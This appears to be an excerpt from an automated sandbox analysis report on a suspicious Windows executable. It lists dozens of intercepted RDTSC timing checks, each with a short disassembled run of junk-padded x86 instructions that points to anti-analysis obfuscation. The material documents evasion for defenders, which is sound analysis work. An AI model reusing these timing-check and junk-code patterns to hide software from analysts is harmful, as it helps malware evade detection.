                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A500 second address: F1A506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A506 second address: F1A53C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA030F107A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 5712086Ah 0x00000011 call 00007FA030F107A9h 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007FA030F107ADh 0x0000001d push esi 0x0000001e pop esi 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jo 00007FA030F107A6h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A53C second address: F1A564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007FA030CAD66Ah 0x0000000e push esi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edi 0x00000017 push esi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop esi 0x0000001b pop edi 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007FA030CAD668h 0x00000026 push ebx 0x00000027 pop ebx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A564 second address: F1A57E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA030F107A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FA030F107A8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A61A second address: F1A61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A6C3 second address: F1A6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A6CB second address: F1A6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA030CAD666h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007FA030CAD671h 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A6ED second address: F1A6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1A6F3 second address: F1A6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1ADD2 second address: F1ADD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1B072 second address: F1B077 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1B077 second address: F1B098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA030F107B4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1B098 second address: F1B09E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1B09E second address: F1B0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1B19E second address: F1B1A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F55F46 second address: F55F4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F560CF second address: F560D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F560D3 second address: F560D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F5664D second address: F56652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F56652 second address: F5665A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F568F1 second address: F56905 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA030CAD66Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F5B2E5 second address: F5B312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107ACh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA030F107B8h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F5B312 second address: F5B326 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F5B326 second address: F5B355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B8h 0x00000007 jmp 00007FA030F107AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007FA030F107A6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F5B355 second address: F5B359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F5B359 second address: F5B36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA030F107AAh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F60334 second address: F60350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA030CAD678h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F60ABC second address: F60ADF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007FA030F107A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA030F107B4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F60D99 second address: F60D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F60D9F second address: F60DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F612F1 second address: F61321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FA030CAD675h 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FA030CAD668h 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F61321 second address: F6132B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FA030F107A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6132B second address: F61335 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA030CAD666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F61335 second address: F6133E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F64D54 second address: F64D67 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FA030CAD66Bh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F64D67 second address: F64D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F64EAB second address: F64EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FA030CAD666h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F66F4F second address: F66F5D instructions: 0x00000000 rdtsc 0x00000002 js 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F66F5D second address: F66F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6BC22 second address: F6BC28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6BC28 second address: F6BC79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Eh 0x00000007 jno 00007FA030CAD67Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FA030CAD675h 0x00000017 jc 00007FA030CAD66Eh 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6BC79 second address: F6BC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6B284 second address: F6B2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA030CAD66Dh 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007FA030CAD66Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6B2A7 second address: F6B2AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6B2AD second address: F6B2B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6B40A second address: F6B426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA030F107B4h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6B7F4 second address: F6B813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA030CAD677h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6F30E second address: F6F312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F6F312 second address: F6F373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA030CAD666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FA030CAD666h 0x00000013 pushad 0x00000014 popad 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007FA030CAD679h 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FA030CAD678h 0x00000025 popad 0x00000026 push ebx 0x00000027 jmp 00007FA030CAD671h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ED5837 second address: ED583F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ED583F second address: ED5843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ED5843 second address: ED5863 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA030F107A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA030F107B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: ED5863 second address: ED5867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73B66 second address: F73B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA030F107A6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73B73 second address: F73B79 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73B79 second address: F73B87 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73B87 second address: F73B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73B8D second address: F73B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73D12 second address: F73D1C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA030CAD666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73D1C second address: F73D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jp 00007FA030F107A6h 0x00000011 js 00007FA030F107A6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ebx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop ebx 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73E7E second address: F73E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73E82 second address: F73E88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73E88 second address: F73E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73E8E second address: F73E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73E92 second address: F73E9C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73E9C second address: F73EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73EA0 second address: F73EAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F73EAE second address: F73EBE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 ja 00007FA030F107AEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1ABBF second address: F1ABC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA030CAD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1ABC9 second address: F1ABCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1ACA9 second address: F1ACBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FA030CAD666h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F1ACBC second address: F1ACD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030F107B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7452D second address: F74541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD66Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F74541 second address: F74552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA030F107ADh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F74FB7 second address: F74FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD677h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F74FD9 second address: F74FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7A66B second address: F7A677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7AFB3 second address: F7AFB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7AFB9 second address: F7AFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7AFC6 second address: F7AFCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7B221 second address: F7B25D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA030CAD670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FA030CAD680h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7B524 second address: F7B583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA030F107AAh 0x00000008 jmp 00007FA030F107B6h 0x0000000d jnp 00007FA030F107A6h 0x00000013 jmp 00007FA030F107ABh 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007FA030F107B0h 0x0000001f jno 00007FA030F107A6h 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jnp 00007FA030F107A6h 0x00000032 jne 00007FA030F107A6h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7B583 second address: F7B5B2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA030CAD666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FA030CAD666h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FA030CAD679h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7B5B2 second address: F7B5B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7C14E second address: F7C154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F7C154 second address: F7C158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F8162F second address: F81668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA030CAD674h 0x00000011 jmp 00007FA030CAD679h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F849BA second address: F849C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F849C3 second address: F849DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA030CAD670h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F84B23 second address: F84B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA030F107A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeRDTSC instruction interceptor: First address: F84B2D second address: F84B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA030CAD675h 0x00000007 je 00007FA030CAD666h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FA030CAD673h 0x00000018 rdtsc
